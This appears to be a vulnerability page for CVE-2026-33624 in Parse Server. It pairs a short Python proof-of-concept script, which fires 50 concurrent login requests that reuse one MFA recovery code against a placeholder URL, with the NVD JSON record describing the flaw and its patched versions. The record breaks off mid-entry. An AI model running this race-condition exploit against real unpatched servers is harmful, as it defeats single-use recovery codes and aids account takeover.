CVE-2026-33624

import asyncio import aiohttp # Target configuration TARGET_URL = "https://example.com/login" USERNAME = "[email protected]" PASSWORD = "user_password" RECOVERY_CODE = "123456" # Single use recovery code async def send_login_request(session): payload = { "username": USERNAME, "password": PASSWORD, "mfa_recovery_code": RECOVERY_CODE } try: async with session.post(TARGET_URL, json=payload) as response: status = response.status text = await response.text() return f"Status: {status}, Response: {text}" except Exception as e: return f"Error: {e}" async def main(): # Create a session to manage connections async with aiohttp.ClientSession() as session: # Launch multiple concurrent requests to trigger race condition tasks = [send_login_request(session) for _ in range(50)] results = await asyncio.gather(*tasks) for result in results: print(result) if __name__ == "__main__": asyncio.run(main())

{"cve": {"id": "CVE-2026-33624", "sourceIdentifier": "[email protected]", "published": "2026-03-24T19:16:55.023", "lastModified": "2026-03-25T21:17:05.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.60 and 9.6.0-alpha.54, an attacker who obtains a user's password and a single MFA recovery code can reuse that recovery code an unlimited number of times by sending concurrent login requests. This defeats the single-use design of recovery codes. The attack requires the user's password, a valid recovery code, and the ability to send concurrent requests within milliseconds. This issue has been patched in versions 8.6.60 and 9.6.0-alpha.54."}, {"lang": "es", "value": "Parse Server es un backend de código abierto que puede ser desplegado en cualquier infraestructura que pueda ejecutar Node.js. Antes de las versiones 8.6.60 y 9.6.0-alpha.54, un atacante que obtiene la contraseña de un usuario y un único código de recuperación MFA puede reutilizar ese código de recuperación un número ilimitado de veces enviando solicitudes de inicio de sesión concurrentes. Esto anula el diseño de un solo uso de los códigos de recuperación. El ataque requiere la contraseña del usuario, un código de recuperación válido y la capacidad de enviar solicitudes concurrentes en cuestión de milisegundos. Este problema ha sido parcheado en las versiones 8.6.60 y 9.6.0-alpha.54."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "8.6.60", "matchCriteriaId": "D3CEFBCC-B847-4BA5-A893-E6736D31A255"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.6.0", "matchCriteriaId": "1BAC01F8-0899-482C-8D91-64671BF2859A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.6.0:alpha1:*:*:*:node.js:*:*", "matchCriteriaId": "BBED261F-CA1B-44BC-9C3A-37378590EFEE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.6.0:alpha10:*:*:*:node.js:*:*", "matchCriteriaId": "418338C9-6AEC-492C-ACA4-9B3C0AAE149C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.6.0:alpha11:*:*:*:node.js:*:*", "matchCriteriaId": "808B6482-BF8E-407D-8462-E757657CC323"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.6.0:alpha12:*:*:*:node.js:*:*", "matchCriteriaId": "B84C28F8-AADE-41BB-A0EF-B701AB57DC3A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.6.0:alpha13:*:*:*:node.js:*:*", "matchCriteriaId": "7567BB ... (truncated)